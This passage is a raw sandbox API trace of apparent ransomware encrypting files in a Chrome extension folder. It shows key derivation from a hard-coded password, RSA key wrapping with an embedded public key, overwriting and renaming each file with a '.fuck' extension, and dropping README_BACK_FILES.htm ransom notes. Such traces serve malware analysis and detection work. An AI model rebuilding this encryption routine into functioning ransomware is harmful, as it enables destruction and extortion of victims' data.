data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0248.612] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.612] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.612] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.612] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.612] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.612] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0248.612] AreFileApisANSI () returned 1 [0248.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0248.613] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.613] GetFileType (hFile=0x5d50) returned 0x1 [0248.613] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.614] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.614] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0248.615] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.615] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.615] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.615] GetLastError () returned 0x0 [0248.615] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0248.618] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0248.618] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.618] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.619] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.620] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.622] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.622] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.622] CryptHashData (hHash=0x2938af8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.622] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938af8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29387f8) returned 1 [0248.622] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.622] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.622] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293c248) returned 1 [0248.623] CryptImportPublicKeyInfo (in: hCryptProv=0x293c248, dwCertEncodingType=0x1, pInfo=0x2930710*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930740*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930748*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937878) returned 1 [0248.623] CryptEncrypt (in: hKey=0x2937878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.623] CryptEncrypt (in: hKey=0x2937878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c578*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c578*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.623] WriteFile (in: hFile=0x5d58, lpBuffer=0x293c578*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c578*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.624] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd1, lpOverlapped=0x0) returned 1 [0248.625] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.625] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.626] CloseHandle (hObject=0x5d5c) returned 1 [0248.626] CloseHandle (hObject=0x5d58) returned 1 [0248.626] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0248.629] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0248.630] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0248.631] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0248.632] CryptDestroyHash (hHash=0x2938af8) returned 1 [0248.632] CryptDestroyKey (hKey=0x29387f8) returned 1 [0248.632] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.632] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.633] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.633] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0248.633] AreFileApisANSI () returned 1 [0248.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0248.633] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.634] GetFileType (hFile=0x5d50) returned 0x1 [0248.634] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.635] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0248.635] FindClose (in: hFindFile=0x29387b8 | out: hFindFile=0x29387b8) returned 1 [0248.635] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0248.635] AreFileApisANSI () returned 1 [0248.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 150 [0248.635] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.636] GetFileType (hFile=0x5d54) returned 0x1 [0248.636] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0248.637] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0248.637] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2938978 [0248.638] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.638] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.638] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0248.638] GetLastError () returned 0x0 [0248.638] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json")) returned 0x20 [0248.639] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x80) returned 1 [0248.639] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.640] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.652] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.gsg", dwFileAttributes=0x2) returned 1 [0248.653] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x293aae8) returned 1 [0248.655] CryptCreateHash (in: hProv=0x293aae8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0248.655] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.655] CryptHashData (hHash=0x29387f8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.655] CryptDeriveKey (in: hProv=0x293aae8, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x29389f8) returned 1 [0248.655] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.656] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0248.656] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2939eb0) returned 1 [0248.656] CryptImportPublicKeyInfo (in: hCryptProv=0x2939eb0, dwCertEncodingType=0x1, pInfo=0x2931a90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931ac0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931ac8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2938af8) returned 1 [0248.656] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0248.656] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939f38*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2939f38*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0248.656] WriteFile (in: hFile=0x5d58, lpBuffer=0x2939f38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2939f38*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0248.657] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x160, lpOverlapped=0x0) returned 1 [0248.659] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x160, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x170) returned 1 [0248.659] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x170, lpOverlapped=0x0) returned 1 [0248.659] CloseHandle (hObject=0x5d50) returned 1 [0248.659] CloseHandle (hObject=0x5d58) returned 1 [0248.659] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), bFailIfExists=0) returned 1 [0248.663] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x0) returned 1 [0248.663] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.gsg")) returned 1 [0248.665] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.fuck")) returned 1 [0248.666] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.666] CryptDestroyKey (hKey=0x29389f8) returned 1 [0248.666] CryptReleaseContext (hProv=0x293aae8, dwFlags=0x0) returned 1 [0248.666] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.666] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0248.666] GetLastError () returned 0x0 [0248.666] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json")) returned 0x20 [0248.666] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0248.667] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 